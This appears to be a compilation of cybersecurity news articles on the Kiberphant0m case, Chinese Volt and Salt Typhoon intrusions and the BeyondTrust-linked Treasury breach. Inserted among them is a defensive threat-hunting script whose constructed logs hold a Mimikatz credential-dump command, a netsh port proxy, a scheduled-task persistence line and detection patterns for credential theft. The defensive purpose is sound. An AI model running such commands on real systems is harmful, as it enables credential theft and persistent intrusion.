The profile photo on Wagenius’ Facebook page was deleted within hours of my Nov. 26 story identifying Kiberphant0m as a likely U.S. Army soldier. Still, many of his original profile photos remain, including several that show Wagenius in uniform while holding various Army-issued weapons.

Several profile photos visible on the Facebook page of Cameron Wagenius.

November’s story on Kiberphant0m cited his own Telegram messages saying he maintained a large botnet that was used for distributed denial-of-service (DDoS) attacks to knock websites, users and networks offline. In 2023, Kiberphant0m sold remote access credentials for a major U.S. defense contractor.

Allison Nixon, chief research officer at the New York-based cybersecurity firm Unit 221B, helped track down Kiberphant0m’s real life identity. Nixon was among several security researchers who faced harassment and specific threats of violence from Judische and his associates.

“Anonymously extorting the President and VP as a member of the military is a bad idea, but it’s an even worse idea to harass people who specialize in de-anonymizing cybercriminals,” Nixon told KrebsOnSecurity. She said the investigation into Kiberphant0m shows that law enforcement is getting better and faster at going after cybercriminals — especially those who are actually living in the United States.

“Between when we, and an anonymous colleague, found his opsec mistake on November 10th to his last Telegram activity on December 6, law enforcement set the speed record for the fastest turnaround time for an American federal cyber case that I have witnessed in my career,” she said.

Nixon asked to share a message for all the other Kiberphant0ms out there who think they can’t be found and arrested.

“I know that young people involved in cybercrime will read these articles,” Nixon said. “You need to stop doing stupid shit and get a lawyer. Law enforcement wants to put all of you in prison for a long time.”

The indictment against Wagenius was filed in Texas, but the case has been transferred to the U.S. District Court for the Western District of Washington in Seattle.


China’s cyber intrusions turns sinister in 2024 • The Register


The Chinese government’s intrusions into America’s telecommunications and other critical infrastructure networks this year appear to signal a shift from cyberspying as usual to prepping for destructive attacks.

The FBI and other US federal agencies rang in 2024 boasting about disrupting a Chinese botnet composed of “hundreds” of outdated routers intent on breaking into US critical infrastructure facilities. Spoiler alert: the botnet is back.

This same government-backed crew also compromised at least one large US city’s emergency services network, and has been conducting reconnaissance and enumeration of “multiple” American electric companies since early 2023.

Soon after these intrusions came to light, the Feds began issuing very public alerts that Volt Typhoon was preparing to “wreak havoc” on American infrastructure and “cause societal chaos” in the US. 

“Volt Typhoon’s choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the US authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions,” the government agencies warned.

The public learned later in the year that another Beijing hacking unit, this one called Salt Typhoon, had broken into American telecommunications networks in what one senior US senator called the “worst telecom hack in our nation’s history – by far.”

According to government and infosec sources, the attacks remain ongoing.

“We cannot say with certainty that the adversary has been evicted, because we still don’t know the scope of what they’re doing,” Jeff Greene, CISA’s executive assistant director for cybersecurity, told reporters during a Salt Typhoon briefing in early December.

‘Every org should be put on notice’

“Every organization should look at this as being put on notice that there are hostile nation state entities,” CrowdStrike Senior VP of Counter Adversary Operations Adam Meyers told The Register. “If you are involved in any degree of business that ties into the broader international ecosystem, or you’re providing services that are of logistical importance for critical infrastructure, you’re in the line of fire.” 

CrowdStrike tracks 63 different China-linked groups, and about two dozen of these are currently active, according to Meyers. In November, Meyers testified before a Senate committee on how the cyberthreats from the Middle Kingdom have evolved over the past two decades. 

Prior to 2015, these tended to be “smash-and-grab” raids, he said, noting that over the years, they have become more targeted intrusions that focus on high-value individuals and information: sources of political and military secrets, and intellectual property that can advance China’s national interests.

Even more worrisome is that at least one of these state-sponsored groups, Volt Typhoon, which CrowdStrike tracks as “Vanguard Panda,” appears to be pre-positioning deep inside American critical infrastructure networks so it’s ready for disruptive or destructive attacks preceding or coinciding with military activities.

“The reason that Vanguard Panda attracted so much attention was that it was the first time that there was a demonstrable aspect of pre-positioning,” Meyers said during an interview. “This would be like if the Russians, back in the ’60s, thought they were going to invade the United States. Their pre-positioning would be to hide caches of weapons and resources that they could access as they mounted their invasion across the US.”


Plus, it’s unlikely that blowing up the botnet earlier this year did anything to disrupt the larger organization, or its future plans, he added.

“Disrupting that did not impact Vanguard Panda,” Meyers said. “It did not impact their ability to access the targets that they had gained access to and were continuing to maintain persistence.”

He said he’s doubtful that Volt Typhoon/Vanguard Panda was even running the botnet infrastructure. “That was likely another group that was tasked with providing communications infrastructure, and when that got disrupted, you would have to expect that there would have been a secondary path that would have been on standby,” Meyers noted. “They’re not going to just leave things to chance. If there’s a primary mechanism that they’re using, then they want a secondary and a tertiary one.” 

Before implanting the KV botnet malware on routers and other devices, Volt Typhoon has to break in, which usually involves exploiting bugs in firewalls, VPN appliances, and web servers, or abusing misconfigurations or weak – sometimes non-existent – passwords in these products.

Volt Typhoon’s post-exploitation activity

Tenable last month published a list of some of the CVEs that the crew has exploited in the past to gain initial access. These include a vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software that allows a remote, unauthenticated attacker to upload a file to any location on the filesystem (CVE-2021-27860), a critical authentication bypass flaw in Zoho ManageEngine ADSelfService Plus (CVE-2021-40539), two critical heap-based buffer overflow bugs in Fortinet FortiOS and FortiProxy (CVE-2022-42475 and CVE-2023-27997) and a file upload flaw in Versa Director SD-WAN (CVE-2024-39717). 

Lumen Technologies’ Black Lotus Labs in August warned that Volt Typhoon was abusing the Versa vulnerability CVE-2024-39717 to plant custom, credential-harvesting web shells on customers’ networks and noted that these attacks are “likely ongoing” against unpatched systems.

“What’s unique about Volt Typhoon is the post-exploitation activity,” Tenable research engineer Scott Caveza told The Register. It doesn’t use custom malware, which can be more easily spotted by antivirus software, but instead uses legitimate software products and credentials to snoop around and avoid detection. 

These include Windows tools (cmd.exe, netsh, and PowerShell) for command execution and lateral movement, Mimikatz to extract credentials from memory, Remote Desktop Protocol (RDP) to burrow deeper into internal systems, and Windows Task Scheduler to establish scheduled tasks for regular, persistent access.

“Just executing normal commands and binaries that would be found on a Windows system to do reconnaissance, and further their way through the network,” Caveza said. “It’s very stealth activity, and really speaks to the skill this group has at evading security software suites and making the traffic look seemingly normal.”
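The living-off-the-land activity Caveza describes is hard to catch with signatures on a single binary, because each tool is legitimate on its own; what stands out is several of them appearing together on one host. The following is an added example, not code from Tenable, Caveza or the article: a small hunt over constructed process-creation events (a simplified, assumed Sysmon Event ID 1 / Windows 4688-style format) that matches the tools named above and only escalates a host once multiple distinct techniques are seen. The rule patterns, log format, hostnames and commands are all constructed assumptions for illustration.

```python
"""Hunt for living-off-the-land activity in process-creation logs.

Added example, not from the article or any vendor mentioned in it. The log
format, the sample events and the rule patterns are constructed assumptions:
the fields mimic a simplified Sysmon Event ID 1 / Windows 4688 record.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample events (assumed format):
# timestamp | host | user | parent image | image | command line
SAMPLE_EVENTS = r"""
2024-11-02T03:12:09Z|WS-FIN-07|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\netsh.exe|netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=3389
2024-11-02T03:13:41Z|WS-FIN-07|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\schtasks.exe|schtasks /create /tn Updater /tr C:\Users\Public\u.bat /sc minute /mo 30 /ru SYSTEM
2024-11-02T03:15:02Z|WS-FIN-07|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Users\Public\m.exe|m.exe sekurlsa::logonpasswords
2024-11-02T09:00:00Z|WS-HR-02|CORP\jdoe|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd /c dir
2024-11-02T09:05:10Z|WS-HR-02|CORP\jdoe|C:\Windows\explorer.exe|C:\Windows\System32\netsh.exe|netsh wlan show profiles
2024-11-02T10:22:33Z|SRV-APP-01|CORP\admin_t|C:\Windows\System32\services.exe|C:\Windows\System32\cmd.exe|cmd /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
"""

# Each rule: (technique name, regex on the image path, regex on the command line).
# The patterns are assumptions chosen to illustrate the tools the article names
# (netsh, Task Scheduler, Mimikatz, RDP, PowerShell); tune them to your estate.
RULES = [
    ("netsh_portproxy", r"\\netsh\.exe$", r"\bportproxy\s+add\b"),
    ("schtasks_create", r"\\schtasks\.exe$", r"/create\b"),
    ("credential_dump", r".", r"sekurlsa::|lsadump::|mimikatz"),
    ("rdp_enable", r"\\(cmd|reg)\.exe$", r"fDenyTSConnections.*\s/d\s+0\b"),
    ("powershell_encoded", r"\\powershell\.exe$", r"\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in RULES]


@dataclass
class Event:
    timestamp: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


def parse_events(text: str) -> List[Event]:
    """Parse the pipe-delimited constructed format; the command line may itself contain '|'."""
    events = []
    for line in text.strip().splitlines():
        parts = line.split("|", 5)
        if len(parts) != 6:
            continue  # malformed record: skip it rather than abort the whole hunt
        events.append(Event(*parts))
    return events


def match_rules(event: Event) -> List[str]:
    """Return the names of every rule the event triggers (image AND command line must match)."""
    return [name for name, img, cmd in COMPILED
            if img.search(event.image) and cmd.search(event.cmdline)]


def hunt(text: str, min_techniques: int = 2) -> Dict[str, dict]:
    """Group hits per host and report hosts showing at least min_techniques distinct techniques.

    Requiring several distinct techniques on one host cuts the noise from a single,
    legitimately used binary: an admin running netsh once is not an intrusion.
    """
    per_host: Dict[str, dict] = {}
    for ev in parse_events(text):
        hits = match_rules(ev)
        if not hits:
            continue
        entry = per_host.setdefault(ev.host, {"techniques": [], "events": 0, "users": set()})
        entry["events"] += 1
        entry["users"].add(ev.user)
        for h in hits:
            if h not in entry["techniques"]:
                entry["techniques"].append(h)  # keep first-seen order for the analyst
    return {host: {"techniques": e["techniques"], "events": e["events"], "users": sorted(e["users"])}
            for host, e in per_host.items() if len(e["techniques"]) >= min_techniques}


if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS).items():
        print(host, finding)
```

Run against the constructed sample, only WS-FIN-07 is escalated (three distinct techniques under one account within minutes), while the single `netsh wlan` use on WS-HR-02 and the lone RDP registry change on SRV-APP-01 stay below the threshold unless `min_techniques` is lowered to 1. In production the same correlation would be keyed on a time window as well as the host.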

In addition to Volt Typhoon and some of the other Chinese government groups using stealthy, so-called “living-off-the-land” techniques, another noteworthy aspect of their ongoing operations targeting critical industries is the US government’s very loud response to the attacks. 

Caught in the cookie jar

Not only did the FBI, CISA, and other government agencies sound the alarm on the Chinese intruders, but they also published a threat hunting guide and listed actions to mitigate Volt Typhoon activity, including patching internet-facing systems, using phishing-resistant multi-factor authentication, and ditching outdated gear that is no longer supported by the manufacturer.

“Number one, kudos to our government,” ZeroFox VP of Intelligence Adam Darrah told The Register. “I do applaud the United States government for being more bold in publicizing these campaigns and saying here’s how to prevent this being an issue. It’s a way to crowdsource national defense.”

While every major intelligence agency in the world spies on adversarial – and sometimes even friendly – government, China’s cyberoperations this year should be a “wake-up call” to people, Darrah added. 

“China has historically been very careful and good about not getting publicly caught with their hand in the American military cookie jar,” he said. “So what was interesting to me: Number one they got caught. Number two: it was publicized. And number three: I’m happy to see this, because it’s time to stop pretending China is this peaceful country that only wants to steal our IP for economic and trade reasons. That’s not true.”

Rafe Pilling, director of threat intelligence for the Secureworks counter threat unit, also highlighted the US government’s efforts to encourage people to mitigate the threat posed by Volt Typhoon. And not only “the threat that has been posed today” with the targeted reconnaissance and espionage activities, “but perhaps more about the threat posed in the future – the wider, unknown activity that might be out there.”

“This includes the pre-positioning warnings and readying for future attacks.”

Pilling’s team covers the gamut of threat groups, from financially motivated cybercrime organizations to nation-state attackers, and China “consistently tops our list of state sponsored actors,” he told The Register.

The first cases that Secureworks now attributes to Volt Typhoon (it tracks this crew as Bronze Silhouette) occurred in June and September 2021.

But at the time, “we had a number of incidents we responded to for customers involving that threat group that we just had a question mark over,” Pilling said. “They didn’t fall into any of the other buckets we tracked, so we put a question mark, ‘China?’ over those incidents.”

It was only years later, after information sharing efforts with public and private researchers, “that you see there is this wider set of activities targeting organizations in mainland United States all the way out to telcos in Guam,” he added. 

But even back in 2021, “the activity we saw certainly looked like access-type operations,” Pilling said. “Once you get past the access stage, you can achieve a number of intents, everything from espionage to pre-positioning for disruptive operations. And they’re not mutually exclusive.”

While security and incident response firms get called in after an attack has occurred, the defenders on the front lines are those working in the water, electric grid, oil and gas, and other critical sectors.

Front-line defenders

These are among the customers of operational technology (OT) security firm Xona Systems, and the consensus is: “There’s a lot more that could be done to protect critical infrastructure,” COO Bill Cantrell told The Register. “The overriding theme is that there’s just not enough funding.”

The biggest concern among critical infrastructure owners and operators continues to be physical safety and reliability. “Those things have always been at the forefront in this industry,” Cantrell said. “There’s a lot of very dangerous, high-power equipment and so it’s making sure it’s reliable, it’s safe, and there are good backup procedures.”

These are very real concerns. Critical systems providing drinking water or heat can’t fail without potential life-and-death consequences, and shutting down these systems to update or patch security flaws introduces a raft of physical-world risks.

Over the last several years, however, there have been added concerns around network connectivity and remote access as more OT and IoT devices and systems become connected to the internet. 

“It’s a new vector of pressure that has been put on these OT folks,” Cantrell said. “It’s a world where the OT guys don’t understand the networking and cyber issues, and the IT guys don’t really understand all of the constraints around safety and reliability that go along with these OT networks.”

The most important thing that critical industries should be doing is to modernize secure access to remote infrastructure, according to Cantrell. “That’s where most of these breaches come from is through stolen credentials, VPNs, older jump boxes,” he said, adding that visibility is another key piece. “Half the time, they don’t even know everything that is on the network.”

And it’s a lot to deal with for an org using legacy OT gear and trying to get up to speed on IT concepts like zero-trust access while facing down attempted attacks from ransomware crews and nation-states on a daily basis. 

“The scary thing is that some of these threats may be laying in wait and dormant right now,” Cantrell said. “They may be doing some intel collection and possibly laying in wait to trigger actions when they feel it’s necessary.”

He echoed CISA and the FBI’s alerts of late about it being incredibly hard to kick intruders off of critical networks when you don’t know they are there in the first place. “Some of them may be compromised, and they may not even know it.” ®


Treasury workstations hacked by China-linked threat actors


The Department of Treasury was notified earlier this month that several of its workstations were hacked by a group believed to be linked to China, the department confirmed to CyberScoop.

According to a letter sent Monday to leaders on the Senate Committee on Banking, Housing and Urban Affairs and obtained by CyberScoop, the compromises occurred through third-party software provider BeyondTrust, which provides identity and access management security solutions.

Treasury officials were notified by BeyondTrust on Dec. 8 that “a threat actor had gained access to a key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices end users,” the letter states.

“With access to the stolen key, the threat actor was able to override the service’s security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users,” wrote Aditi Hardikar, Treasury’s assistant secretary for management.

In a statement sent to CyberScoop, a BeyondTrust spokesperson said the company first noticed anomalous activity on Dec. 2 and confirmed on Dec. 5 that it was affecting a “limited” number of Remote Support SaaS customers. The company said it posted an advisory about the incident on Dec. 8, and the timeline indicates that all identified instances were patched as of Dec. 16.

“No other BeyondTrust products were involved. Law enforcement was notified and BeyondTrust has been supporting the investigative efforts,” the statement said.

Hardikar wrote that the hacks are being classified as a “major incident” under the Federal Information Security and Modernization Act, and the department has been working with the Cybersecurity and Infrastructure Security Agency, the FBI, intelligence agencies, and third-party forensic investigators to scope out the full impact.

“Based on available indicators, the incident has been attributed to a China state-sponsored Advanced Persistent Threat actor,” Hardikar wrote.

In response to questions, a Treasury spokesperson said the threat actor was able to remotely access “several” Treasury user workstations as well as “certain unclassified documents” maintained by those users. The unnamed BeyondTrust service was taken offline and the department believes the actor no longer has access to Treasury systems or information.

News of the hacks was first reported by Barron’s and Agency France-Presse.

The incident comes as Washington policymakers are still reeling from a wide-ranging compromise of U.S. telecommunications infrastructure by Salt Typhoon, a hacking group linked to the Chinese government. Those compromises gave Beijing broad access to the phones and communications of high-ranking U.S. officials, including, reportedly, incoming President-elect Donald Trump and Vice President-elect JD Vance.

This week, the White House said that while fewer than 100 individuals are believed to have been directly impacted by the Salt Typhoon intrusions, a larger group centered around Washington D.C. may have had their geolocation data stolen, something that could potentially allow Chinese intelligence agencies to identify the phones of additional targets.


Written by Derek B. Johnson

Derek B. Johnson is a reporter at CyberScoop, where his beat includes cybersecurity, elections and the federal government. Prior to that, he has provided award-winning coverage of cybersecurity news across the public and private sectors for various publications since 2017. Derek has a bachelor’s degree in print journalism from Hofstra University in New York and a master’s degree in public policy from George Mason University in Virginia.


Chinese State Hackers Breach US Treasury Department


UPDATE: This story was updated on Dec. 30 to include a statement from a BeyondTrust spokesperson.

The US Department of the Treasury alerted lawmakers on Monday that Chinese state-backed threat actors were able to compromise its systems and steal data from workstations earlier this month.

Because an advanced persistent threat (APT) group is suspected to be behind the hack, it is being treated as a “major cybersecurity incident,” said the disclosure letter from the US Department of the Treasury, which was sent to the chairman and ranking member of the Senate committee that oversees the agency.

It explained the adversaries broke into Treasury through a third-party cybersecurity vendor, BeyondTrust, and “…gained access to a remote key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices (DO) end users,” the letter said. “With access to the stolen key, the threat actor was able to override the service’s security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users.”

The BeyondTrust website said the company has more than 20,000 customers across more than 100 countries who use its privileged remote access tools. The site adds BeyondTrust is used among 75% of Fortune 100 organizations. The company has not responded to Dark Reading’s request for comment.

Treasury added that it was told by BeyondTrust about the issue on Dec. 8 and, along with the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI, is investigating the compromise, according to the letter.

A BeyondTrust advisory said the company was alerted on Dec. 5 to a compromised API key, which was immediately revoked. Impacted customers have already been notified and the company is working with them on remediation, according to a statement from a BeyondTrust spokesperson.

“BeyondTrust previously identified and took measures to address a security incident in early December 2024 that involved the Remote Support product,” the statement said. “No other BeyondTrust products were involved.”

‘Epic’ Chinese Hack of US Treasury

The revelation that Beijing was able to strike right at the heart of America’s federal capitalist system itself comes as the federal government is still grappling with the sprawling and coordinated Chinese-backed cyberattacks against telecommunications companies in the US. Once inside, hackers from groups including Salt Typhoon accessed call data and text messages of an unknown number of Americans. So far, Chinese hacking groups have been discovered inside at least nine different telecom networks in the US.

While investigations into the US Treasury breach are ongoing, these brazen Chinese acts of cyber espionage are almost certain to require dicey diplomatic maneuvering. That could prove difficult to pull off during the murky transition period from the Biden administration to the incoming Trump administration.

“Beijing’s routine denial of responsibility for cyberespionage incidents raises diplomatic challenges with the US in addressing such breaches effectively since there’s a lack of transparency and accountability/coordination,” Lawrence Pingree, vice president of Dispersive, said in a statement provided to Dark Reading.

He added that it’s still unclear whether the Chinese hackers were able to crack the application’s secrets, or a cryptographic key.

“Secrets and cryptographic key management are critical elements of managing software API access and thus if deficient in some way, or a compromise occurs via a developer’s endpoint, the breach of those secrets and authentication keys can create these types of epic breaches,” he added.
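Pingree’s point about secrets and key management is worth making concrete. The article says BeyondTrust revoked the compromised API key once it was identified; the value of that step depends on the server side recognising and rejecting a revoked key on its very next use, and on that use being visible to defenders. The block below is an added example, not BeyondTrust’s implementation (the article does not describe it), of a minimal API-key store that keeps only a hash of each secret, enforces scope and expiry, supports immediate revocation, and records every authentication attempt so that use of a revoked or guessed key surfaces as an alert. `KeyStore`, `issue()`, `revoke()`, `authenticate()` and the injectable clock are assumed names chosen for this illustration.

```python
"""API key lifecycle: hashed storage, scope, expiry, revocation and audit.

Added example, not BeyondTrust's implementation. KeyStore, issue(), revoke()
and authenticate() are assumed names; the injectable clock exists so that
expiry can be exercised deterministically in tests.
"""
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, FrozenSet, Iterable, List, Tuple


def _digest(secret: str) -> str:
    # Only a SHA-256 digest of the secret is stored, so a dump of the
    # store (or of a backup) does not yield usable keys.
    return hashlib.sha256(secret.encode()).hexdigest()


@dataclass
class KeyRecord:
    key_id: str
    digest: str
    owner: str
    scope: FrozenSet[str]
    expires_at: float
    revoked: bool = False


class KeyStore:
    def __init__(self, clock: Callable[[], float] = time.time):
        self._records: Dict[str, KeyRecord] = {}
        self._clock = clock
        # (key_id, outcome) for every authentication attempt, success or failure
        self.audit: List[Tuple[str, str]] = []

    def issue(self, owner: str, scope: Iterable[str], ttl_seconds: float) -> str:
        """Create a key and return the only copy of its plaintext as '<key_id>.<secret>'."""
        key_id = secrets.token_hex(8)
        secret = secrets.token_urlsafe(32)
        self._records[key_id] = KeyRecord(
            key_id, _digest(secret), owner, frozenset(scope), self._clock() + ttl_seconds)
        return f"{key_id}.{secret}"

    def revoke(self, key_id: str) -> bool:
        """Revoke immediately; the record is kept so later use of the key is still recognised."""
        rec = self._records.get(key_id)
        if rec is None:
            return False
        rec.revoked = True
        return True

    def authenticate(self, token: str, required_scope: str) -> Tuple[bool, str]:
        """Check a presented token; every attempt, including failures, is recorded."""
        key_id, _, secret = token.partition(".")
        rec = self._records.get(key_id)
        if rec is None:
            outcome = "unknown_key"
        elif not hmac.compare_digest(rec.digest, _digest(secret)):
            outcome = "bad_secret"      # constant-time comparison of the digests
        elif rec.revoked:
            outcome = "revoked"         # correct secret for a revoked key: the stolen key is in use
        elif self._clock() >= rec.expires_at:
            outcome = "expired"
        elif required_scope not in rec.scope:
            outcome = "out_of_scope"    # a support key must not unlock admin functions
        else:
            outcome = "ok"
        self.audit.append((key_id, outcome))
        return outcome == "ok", outcome

    def alerts(self) -> List[Tuple[str, str]]:
        """Attempts worth paging on: a revoked key still being presented, or a wrong secret."""
        return [(k, o) for k, o in self.audit if o in ("revoked", "bad_secret")]
```

Two design choices matter here. The secret is compared only as a digest with `hmac.compare_digest`, so neither the store nor the comparison leaks the plaintext; and revoked records are retained rather than deleted, so a later presentation of the stolen key is classified as `revoked` (an alert) instead of `unknown_key` (noise). Short TTLs bound the damage of a key that leaks before anyone notices.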

The breach also shows that cybersecurity vendors remain favorite targets of sophisticated state threat actors, according to former NSA cyber expert Evan Dornbush, who provided a statement in reaction to the breach.

“The cybersecurity world is reeling from yet another high-profile breach, this time targeting the clients of security vendor BeyondTrust,” Dornbush said. “This incident joins a growing list of attacks on security firms, including Okta (whose breach directly impacted BeyondTrust as a customer), LastPass, SolarWinds, and Snowflake.”
